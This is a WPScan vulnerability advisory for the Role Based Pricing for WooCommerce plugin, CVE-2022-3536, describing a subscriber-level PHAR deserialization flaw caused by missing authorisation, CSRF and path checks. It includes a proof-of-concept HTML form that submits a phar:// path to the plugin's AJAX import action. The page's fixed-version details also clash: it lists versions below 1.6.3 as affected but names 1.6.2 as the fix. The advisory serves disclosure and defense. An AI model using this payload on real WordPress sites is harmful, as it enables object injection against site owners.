WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization

Description

The plugin does not have authorisation and proper CSRF checks, as well as does not validate path given via user input, allowing any authenticated users like subscriber to perform PHAR deserialization attacks when they can upload a file, and a suitable gadget chain is present on the blog

Proof of Concept

As a subscriber, upload a malicious file being a PHAR with a gadget chain, open the HTML code below while being logged in as a subscriber and submit it

<form action="https://example.com/wp-admin/admin-ajax.php?action=import_pricing_rules" method="POST" enctype="multipart/form-data">
    <input type="text" name="file_path" value="phar://path-to-malicious-phar">
    <input type="text" name="afcsp_nonce" value="xxxxx"><!-- since 1.6.2 -->
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

role-based-pricing-for-woocommerce
Fixed in version 1.6.2

References

CVE
CVE-2022-3536

Classification

Type

OBJECT INJECTION

OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
6af63aab-b7a6-4ef6-8604-4b4b99467a34

Timeline

Publicly Published

2022-10-17 (about 3 months ago)

Added

2022-10-17 (about 3 months ago)

Last Updated

2022-10-17 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin